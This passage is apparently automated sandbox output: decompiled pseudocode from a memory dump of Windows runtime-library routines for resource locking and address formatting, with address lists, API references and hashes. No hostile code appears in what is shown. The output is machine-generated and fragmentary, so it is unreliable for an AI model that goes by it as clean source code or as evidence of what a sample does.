                                                                                                                                                        											__eflags = _t107;
                                                                                                                                                        											if(__eflags > 0) {
                                                                                                                                                        												while(1) {
                                                                                                                                                        													_t81 = _t107;
                                                                                                                                                        													asm("lock cmpxchg [edi], esi");
                                                                                                                                                        													__eflags = _t81 - _t107;
                                                                                                                                                        													if(_t81 == _t107) {
                                                                                                                                                        														break;
                                                                                                                                                        													}
                                                                                                                                                        													_t107 = _t81;
                                                                                                                                                        													__eflags = _t81;
                                                                                                                                                        													if(_t81 > 0) {
                                                                                                                                                        														continue;
                                                                                                                                                        													}
                                                                                                                                                        													break;
                                                                                                                                                        												}
                                                                                                                                                        												_t56 = _a4;
                                                                                                                                                        												__eflags = _t107;
                                                                                                                                                        											}
                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                        												while(1) {
                                                                                                                                                        													L3:
                                                                                                                                                        													__eflags = _t56;
                                                                                                                                                        													if(_t56 != 0) {
                                                                                                                                                        														goto L32;
                                                                                                                                                        													}
                                                                                                                                                        													_t107 = _t107 | 0xffffffff;
                                                                                                                                                        													_t56 = 0;
                                                                                                                                                        													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                        													__eflags = 0;
                                                                                                                                                        													if(0 != 0) {
                                                                                                                                                        														continue;
                                                                                                                                                        													} else {
                                                                                                                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                        														return 1;
                                                                                                                                                        													}
                                                                                                                                                        													goto L59;
                                                                                                                                                        												}
                                                                                                                                                        												continue;
                                                                                                                                                        											} else {
                                                                                                                                                        												goto L40;
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = 0;
                                                                                                                                                        									return 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t115 =  *(_t96 + 0x28);
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t106 =  *_t49;
                                                                                                                                                        								__eflags = _t106;
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									while(1) {
                                                                                                                                                        										_t93 = _t106;
                                                                                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                                                                                        										__eflags = _t93 - _t106;
                                                                                                                                                        										if(_t93 == _t106) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										_t106 = _t93;
                                                                                                                                                        										__eflags = _t93;
                                                                                                                                                        										if(_t93 > 0) {
                                                                                                                                                        											continue;
                                                                                                                                                        										}
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _t106;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L23;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L59;
                                                                                                                                                        					}
                                                                                                                                                        					_t84 = _t115;
                                                                                                                                                        					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                        					__eflags = _t84 - _t115;
                                                                                                                                                        					if(_t84 != _t115) {
                                                                                                                                                        						_t115 = _t84;
                                                                                                                                                        						goto L7;
                                                                                                                                                        					} else {
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L59:
                                                                                                                                                        			}




































                                                                                                                                                        0x009421fb
                                                                                                                                                        0x00942206
                                                                                                                                                        0x0094220b
                                                                                                                                                        0x0094220c
                                                                                                                                                        0x00942217
                                                                                                                                                        0x00942226
                                                                                                                                                        0x0094222b
                                                                                                                                                        0x0094222c
                                                                                                                                                        0x0094222f
                                                                                                                                                        0x00942232
                                                                                                                                                        0x00942235
                                                                                                                                                        0x00942235
                                                                                                                                                        0x0094223a
                                                                                                                                                        0x0094223f
                                                                                                                                                        0x00942241
                                                                                                                                                        0x00942243
                                                                                                                                                        0x00942248
                                                                                                                                                        0x00942248
                                                                                                                                                        0x0094224d
                                                                                                                                                        0x0094224f
                                                                                                                                                        0x00942262
                                                                                                                                                        0x00942263
                                                                                                                                                        0x00942268
                                                                                                                                                        0x00942269
                                                                                                                                                        0x00942269
                                                                                                                                                        0x00942269
                                                                                                                                                        0x0094226d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942276
                                                                                                                                                        0x00942279
                                                                                                                                                        0x0094227e
                                                                                                                                                        0x00942283
                                                                                                                                                        0x00942287
                                                                                                                                                        0x0094228a
                                                                                                                                                        0x0094228d
                                                                                                                                                        0x0094228f
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422be
                                                                                                                                                        0x009422c4
                                                                                                                                                        0x009422cc
                                                                                                                                                        0x009422d0
                                                                                                                                                        0x009422d6
                                                                                                                                                        0x009422d7
                                                                                                                                                        0x009422da
                                                                                                                                                        0x009422df
                                                                                                                                                        0x009422e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422e6
                                                                                                                                                        0x009422e9
                                                                                                                                                        0x009422f4
                                                                                                                                                        0x009422f9
                                                                                                                                                        0x009422fa
                                                                                                                                                        0x00942305
                                                                                                                                                        0x00942314
                                                                                                                                                        0x00942319
                                                                                                                                                        0x0094231a
                                                                                                                                                        0x0094231d
                                                                                                                                                        0x00942320
                                                                                                                                                        0x00942323
                                                                                                                                                        0x00942323
                                                                                                                                                        0x00942328
                                                                                                                                                        0x0094232d
                                                                                                                                                        0x0094232f
                                                                                                                                                        0x00942331
                                                                                                                                                        0x00942336
                                                                                                                                                        0x00942336
                                                                                                                                                        0x0094233b
                                                                                                                                                        0x0094233d
                                                                                                                                                        0x00942350
                                                                                                                                                        0x00942351
                                                                                                                                                        0x00942356
                                                                                                                                                        0x00942359
                                                                                                                                                        0x00942359
                                                                                                                                                        0x0094235b
                                                                                                                                                        0x0094235d
                                                                                                                                                        0x00905367
                                                                                                                                                        0x0090536b
                                                                                                                                                        0x00905372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942363
                                                                                                                                                        0x00942363
                                                                                                                                                        0x00942369
                                                                                                                                                        0x0094236a
                                                                                                                                                        0x0094236c
                                                                                                                                                        0x00942371
                                                                                                                                                        0x00942373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942379
                                                                                                                                                        0x00942379
                                                                                                                                                        0x0094237a
                                                                                                                                                        0x0094237f
                                                                                                                                                        0x0094237f
                                                                                                                                                        0x00942385
                                                                                                                                                        0x00942386
                                                                                                                                                        0x00942389
                                                                                                                                                        0x0094238e
                                                                                                                                                        0x00942390
                                                                                                                                                        0x00905378
                                                                                                                                                        0x0090537c
                                                                                                                                                        0x00942396
                                                                                                                                                        0x00942396
                                                                                                                                                        0x00942397
                                                                                                                                                        0x0094239c
                                                                                                                                                        0x009423a2
                                                                                                                                                        0x009423a3
                                                                                                                                                        0x009423a6
                                                                                                                                                        0x009423ab
                                                                                                                                                        0x009423ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009423b3
                                                                                                                                                        0x009423b3
                                                                                                                                                        0x009423b4
                                                                                                                                                        0x009423b9
                                                                                                                                                        0x009423ba
                                                                                                                                                        0x009423ba
                                                                                                                                                        0x009423bc
                                                                                                                                                        0x009423bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939153
                                                                                                                                                        0x00939158
                                                                                                                                                        0x0093915a
                                                                                                                                                        0x0093915e
                                                                                                                                                        0x00939160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939166
                                                                                                                                                        0x00939166
                                                                                                                                                        0x00939171
                                                                                                                                                        0x00939176
                                                                                                                                                        0x00939176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939160
                                                                                                                                                        0x009423c6
                                                                                                                                                        0x009423ce
                                                                                                                                                        0x009423d7
                                                                                                                                                        0x009423d7
                                                                                                                                                        0x009423ad
                                                                                                                                                        0x00942390
                                                                                                                                                        0x00942373
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x00942291
                                                                                                                                                        0x00942291
                                                                                                                                                        0x00942293
                                                                                                                                                        0x00942295
                                                                                                                                                        0x0094229a
                                                                                                                                                        0x009422a1
                                                                                                                                                        0x009422a3
                                                                                                                                                        0x009422a7
                                                                                                                                                        0x009422a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422ab
                                                                                                                                                        0x009422ad
                                                                                                                                                        0x009422af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422af
                                                                                                                                                        0x009422b1
                                                                                                                                                        0x009422b4
                                                                                                                                                        0x009422b4

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00942206
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                        • Opcode ID: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                                                                                                                                                        • Instruction ID: 793d0a2ddc17d124f23479943d463c3082c7fe029ffe019ac97662dd03e1cd72
                                                                                                                                                        • Opcode Fuzzy Hash: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                                                                                                                                                        • Instruction Fuzzy Hash: 91513831B442116FEB14DF19DC81FA633AEBFD8720F218229FD59DB286D965EC418B90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E009214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v10;
                                                                                                                                                        				char _v140;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t24;
                                                                                                                                                        				void* _t26;
                                                                                                                                                        				signed int _t29;
                                                                                                                                                        				signed int _t34;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                        				void* _t54;
                                                                                                                                                        				signed int _t57;
                                                                                                                                                        				void* _t58;
                                                                                                                                                        
                                                                                                                                                        				_t51 = __edx;
                                                                                                                                                        				_t24 =  *0x9c2088; // 0x77777575
                                                                                                                                                        				_v8 = _t24 ^ _t57;
                                                                                                                                                        				_t45 = _a16;
                                                                                                                                                        				_t53 = _a4;
                                                                                                                                                        				_t52 = _a20;
                                                                                                                                                        				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                        					L10:
                                                                                                                                                        					_t26 = 0xc000000d;
                                                                                                                                                        				} else {
                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                        						if( *_t52 == _t45) {
                                                                                                                                                        							goto L3;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						L3:
                                                                                                                                                        						_t28 =  &_v140;
                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                        							_push("[");
                                                                                                                                                        							_push(0x41);
                                                                                                                                                        							_push( &_v140);
                                                                                                                                                        							_t29 = E00917707();
                                                                                                                                                        							_t58 = _t58 + 0xc;
                                                                                                                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                        						}
                                                                                                                                                        						_t54 = E009213CB(_t53, _t28);
                                                                                                                                                        						if(_a8 != 0) {
                                                                                                                                                        							_t34 = E00917707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                        							_t58 = _t58 + 0x10;
                                                                                                                                                        							_t54 = _t54 + _t34 * 2;
                                                                                                                                                        						}
                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                        							_t40 = E00917707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                        							_t58 = _t58 + 0x10;
                                                                                                                                                        							_t54 = _t54 + _t40 * 2;
                                                                                                                                                        						}
                                                                                                                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                        						 *_t52 = _t53;
                                                                                                                                                        						if( *_t52 < _t53) {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						} else {
                                                                                                                                                        							E008E2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                        							_t26 = 0;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				return E008EE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                        			}




















                                                                                                                                                        0x00921533
                                                                                                                                                        0x009214f3
                                                                                                                                                        0x00921559

                                                                                                                                                        APIs
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0094EA22
                                                                                                                                                          • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 0092146B
                                                                                                                                                          • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 00921490
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0092156D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u$uuww
                                                                                                                                                        • API String ID: 48624451-3129179589
                                                                                                                                                        • Opcode ID: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                                                                                                                                                        • Instruction ID: b86a9c3584357acc35dd5c5c0693380c57c963b60c5937a2bbfa751d57c5921c
                                                                                                                                                        • Opcode Fuzzy Hash: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                                                                                                                                                        • Instruction Fuzzy Hash: A621C372A002299BCF21DE58DC41EEAB3BCFBA0700F444551FC46D3245DB749A698BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E009053A5(signed int _a4, char _a8) {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t32;
                                                                                                                                                        				signed int _t37;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				signed int _t42;
                                                                                                                                                        				void* _t45;
                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                        				void* _t48;
                                                                                                                                                        				signed int _t49;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				signed int _t57;
                                                                                                                                                        				signed int _t64;
                                                                                                                                                        				signed int _t71;
                                                                                                                                                        				void* _t74;
                                                                                                                                                        				intOrPtr _t78;
                                                                                                                                                        				signed int* _t79;
                                                                                                                                                        				void* _t85;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				signed int _t92;
                                                                                                                                                        				void* _t104;
                                                                                                                                                        				void* _t105;
                                                                                                                                                        
                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                        				_t32 =  *(_t64 + 0x28);
                                                                                                                                                        				_t71 = _t64 + 0x28;
                                                                                                                                                        				_push(_t92);
                                                                                                                                                        				if(_t32 < 0) {
                                                                                                                                                        					_t78 =  *[fs:0x18];
                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                        						goto L3;
                                                                                                                                                        					} else {
                                                                                                                                                        						__eflags = _t32 | 0xffffffff;
                                                                                                                                                        						asm("lock xadd [ecx], eax");
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L3:
                                                                                                                                                        					_push(_t86);
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L4:
                                                                                                                                                        						__eflags = _t32;
                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                        						if(_a8 == 0) {
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        							return 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        							_t79 = _t64 + 0x24;
                                                                                                                                                        							_t71 = 1;
                                                                                                                                                        							asm("lock xadd [eax], ecx");
                                                                                                                                                        							_t32 =  *(_t64 + 0x28);
                                                                                                                                                        							_a4 = _t32;
                                                                                                                                                        							__eflags = _t32;
                                                                                                                                                        							if(_t32 != 0) {
                                                                                                                                                        								L19:
                                                                                                                                                        								_t86 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								while(1) {
                                                                                                                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                        									asm("sbb esi, esi");
                                                                                                                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009c01c0;
                                                                                                                                                        									_push(_t92);
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_t37 = E008DF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                        									__eflags = _t37 - 0x102;
                                                                                                                                                        									if(_t37 != 0x102) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t71 =  *(_t92 + 4);
                                                                                                                                                        									_t85 =  *_t92;
                                                                                                                                                        									_t51 = E00924FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                        									_push(_t85);
                                                                                                                                                        									_push(_t51);
                                                                                                                                                        									E00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                        									E00933F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                        									_t86 = _t86 + 1;
                                                                                                                                                        									_t105 = _t104 + 0x28;
                                                                                                                                                        									__eflags = _t86 - 2;
                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                        										E0096217A(_t71, __eflags, _t64);
                                                                                                                                                        									}
                                                                                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_push(0x65);
                                                                                                                                                        									E00933F92();
                                                                                                                                                        									_t104 = _t105 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t37;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t37);
                                                                                                                                                        									E00923915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									_t40 =  *_t71;
                                                                                                                                                        									 *_t71 = 0;
                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                        										L1:
                                                                                                                                                        										_t42 = E00905384(_t92 + 0x24);
                                                                                                                                                        										if(_t42 != 0) {
                                                                                                                                                        											goto L31;
                                                                                                                                                        										} else {
                                                                                                                                                        											goto L2;
                                                                                                                                                        										}
                                                                                                                                                        									} else {
                                                                                                                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                        										_push( &_a4);
                                                                                                                                                        										_push(_t40);
                                                                                                                                                        										_t49 = E008DF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                        										__eflags = _t49;
                                                                                                                                                        										if(__eflags >= 0) {
                                                                                                                                                        											goto L1;
                                                                                                                                                        										} else {
                                                                                                                                                        											_push(_t49);
                                                                                                                                                        											E00923915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                        											L31:
                                                                                                                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                        											_push( &_a4);
                                                                                                                                                        											_push(1);
                                                                                                                                                        											_t42 = E008DF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                        											__eflags = _t42;
                                                                                                                                                        											if(__eflags >= 0) {
                                                                                                                                                        												L2:
                                                                                                                                                        												return _t42;
                                                                                                                                                        											} else {
                                                                                                                                                        												_push(_t42);
                                                                                                                                                        												E00923915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                        												_push( &_a4);
                                                                                                                                                        												_push(1);
                                                                                                                                                        												_t42 = E008DF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                        												__eflags = _t42;
                                                                                                                                                        												if(__eflags >= 0) {
                                                                                                                                                        													goto L2;
                                                                                                                                                        												} else {
                                                                                                                                                        													_push(_t42);
                                                                                                                                                        													_t45 = E00923915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                        													asm("int3");
                                                                                                                                                        													while(1) {
                                                                                                                                                        														_t74 = _t45;
                                                                                                                                                        														__eflags = _t45 - 1;
                                                                                                                                                        														if(_t45 != 1) {
                                                                                                                                                        															break;
                                                                                                                                                        														}
                                                                                                                                                        														_t86 = _t86 | 0xffffffff;
                                                                                                                                                        														_t45 = _t74;
                                                                                                                                                        														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                        														__eflags = _t45 - _t74;
                                                                                                                                                        														if(_t45 != _t74) {
                                                                                                                                                        															continue;
                                                                                                                                                        														} else {
                                                                                                                                                        															_t46 =  *[fs:0x18];
                                                                                                                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                        															return _t46;
                                                                                                                                                        														}
                                                                                                                                                        														goto L38;
                                                                                                                                                        													}
                                                                                                                                                        													E00905329(_t74, _t92);
                                                                                                                                                        													_push(1);
                                                                                                                                                        													_t48 = E009053A5(_t92);
                                                                                                                                                        													return _t48;
                                                                                                                                                        												}
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        								} else {
                                                                                                                                                        									_t32 =  *(_t64 + 0x28);
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t71 =  *_t79;
                                                                                                                                                        								__eflags = _t71;
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									while(1) {
                                                                                                                                                        										_t57 = _t71;
                                                                                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                                                                                        										__eflags = _t57 - _t71;
                                                                                                                                                        										if(_t57 == _t71) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										_t71 = _t57;
                                                                                                                                                        										__eflags = _t57;
                                                                                                                                                        										if(_t57 > 0) {
                                                                                                                                                        											continue;
                                                                                                                                                        										}
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t32 = _a4;
                                                                                                                                                        									__eflags = _t71;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L19;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L38;
                                                                                                                                                        					}
                                                                                                                                                        					_t71 = _t71 | 0xffffffff;
                                                                                                                                                        					_t32 = 0;
                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                        					__eflags = 0;
                                                                                                                                                        					if(0 != 0) {
                                                                                                                                                        						goto L4;
                                                                                                                                                        					} else {
                                                                                                                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L38:
                                                                                                                                                        			}


























                                                                                                                                                        0x009423ba
                                                                                                                                                        0x009423ba
                                                                                                                                                        0x009423bc
                                                                                                                                                        0x009423bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939153
                                                                                                                                                        0x00939158
                                                                                                                                                        0x0093915a
                                                                                                                                                        0x0093915e
                                                                                                                                                        0x00939160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939166
                                                                                                                                                        0x00939166
                                                                                                                                                        0x00939171
                                                                                                                                                        0x00939176
                                                                                                                                                        0x00939176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939160
                                                                                                                                                        0x009423c6
                                                                                                                                                        0x009423cb
                                                                                                                                                        0x009423ce
                                                                                                                                                        0x009423d7
                                                                                                                                                        0x009423d7
                                                                                                                                                        0x009423ad
                                                                                                                                                        0x00942390
                                                                                                                                                        0x00942373
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x00942291
                                                                                                                                                        0x00942291
                                                                                                                                                        0x00942293
                                                                                                                                                        0x00942295
                                                                                                                                                        0x0094229a
                                                                                                                                                        0x009422a1
                                                                                                                                                        0x009422a3
                                                                                                                                                        0x009422a7
                                                                                                                                                        0x009422a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422ab
                                                                                                                                                        0x009422ad
                                                                                                                                                        0x009422af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422af
                                                                                                                                                        0x009422b1
                                                                                                                                                        0x009422b4
                                                                                                                                                        0x009422b4
                                                                                                                                                        0x009422b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422b6
                                                                                                                                                        0x0094228f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094226d
                                                                                                                                                        0x009053cb
                                                                                                                                                        0x009053ce
                                                                                                                                                        0x009053d0
                                                                                                                                                        0x009053d4
                                                                                                                                                        0x009053d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009053d8
                                                                                                                                                        0x009053e3
                                                                                                                                                        0x009053ea
                                                                                                                                                        0x009053ea
                                                                                                                                                        0x009053d6
                                                                                                                                                        0x00000000

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009422F4
Strings
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009422FC
• RTL: Re-Waiting, xrefs: 00942328
• RTL: Resource at %p, xrefs: 0094230B
Memory Dump Source
• Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-871070163
